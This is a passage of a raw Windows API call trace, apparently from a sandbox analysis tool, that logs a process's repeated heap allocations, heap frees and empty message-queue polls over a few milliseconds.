Size=0x20) returned 0x8ddfc0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17e0 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddfe8 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a48 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0155.082] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de010 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1800 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1800 | out: hHeap=0x8a0000) returned 1 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1800 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de038 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bc8 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c88 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ca0 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cb8 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f4f4 | out: lpSystemTimeAsFileTime=0x87f4f4*(dwLowDateTime=0x1f19b60, dwHighDateTime=0x1d661be)) [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ca0 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cb8 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de038 | out: hHeap=0x8a0000) returned 1 [0155.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1800 | out: hHeap=0x8a0000) returned 1 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d528 [0155.083] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1800 [0155.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de038 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cb8 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c88 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de060 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ca0 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ca0 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de060 | out: hHeap=0x8a0000) returned 1 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1820 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d280 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d280 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ca0 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cb8 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ca0 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de038 | out: hHeap=0x8a0000) returned 1 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1800 | out: hHeap=0x8a0000) returned 1 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de038 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ca0 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1800 [0155.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ca0 | out: hHeap=0x8a0000) returned 1 [0155.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de060 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ca0 [0155.085] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1810 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de088 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c88 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1820 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cb8 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bc8 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1820 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0155.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0d8 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0b0 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cb8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de088 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1810 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0155.086] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.086] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0b0 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d280 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de088 | out: hHeap=0x8a0000) returned 1 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.086] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0d8 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1840 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cb8 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0b0 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de088 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cb8 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0155.087] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0155.087] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 